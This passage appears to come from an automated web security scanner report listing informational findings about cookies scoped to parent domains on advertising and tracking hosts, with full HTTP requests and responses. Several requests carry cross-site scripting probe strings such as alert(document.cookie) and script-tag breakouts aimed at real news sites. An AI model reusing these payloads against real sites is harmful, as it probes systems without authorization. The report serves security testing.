Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=93BCq0WTCVMxF4AWDa_UBzGK2WVGmSebj4padkL3fXlh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKX8qYrC9FMnU5Q2wRAYDGypi9OYrtG-b0iAWL5Sg__z6OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qajUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuV6ONoHWtyiE_pNTuBZXnxgi4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 17:37:28 GMT
Content-Length: 9353

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...

10.24. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 14:48:47 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4510090875291133304&fpid=6&nu=n&t=
...[SNIP]...

10.25. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d791689/21/39823749/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d791689/21/39823749/decide.php?ord=1296226106 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:41 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.26. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296224089.327,wait-%3E10000,&1296224142212 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_G=method->-1,ts->1296224088; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:50 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.27. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p85001580=exp=21&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:19:48 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296263988%2E989%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 01:32:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27557

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779",Location:CO
...[SNIP]...

10.28. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26257

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO
...[SNIP]...

10.29. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p83612734&PRAd=57555319&AR_C=39967551 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=10&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 21:57:55 2011&prad=58087444&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296251875%2E953%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 22:52:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24910

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57555319",Pid:"p83612734",Arc:"39967551",Location:CO
...[SNIP]...

10.30. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.track.decideinteractive.com
Path:	/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=9272912264837465719; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
name=9272912264820689035; path=/; domain=.decideinteractive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:12:05 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:12:05 GMT
location: http://www.247realmedia.com
Set-Cookie: id=9272912264837465719; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912264820689035; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

10.31. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&rn=534961991&c7=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&c3=15&c4=7477&c10=3182236&c8=Page%20Not%20Found&c9=http%3A%2F%2Fburp%2Fshow%2F4&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 28 Jan 2011 14:14:32 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.32. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=31314505&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x00241B%29%253C%2Fscript%253E HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 28 Jan 2011 15:00:13 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
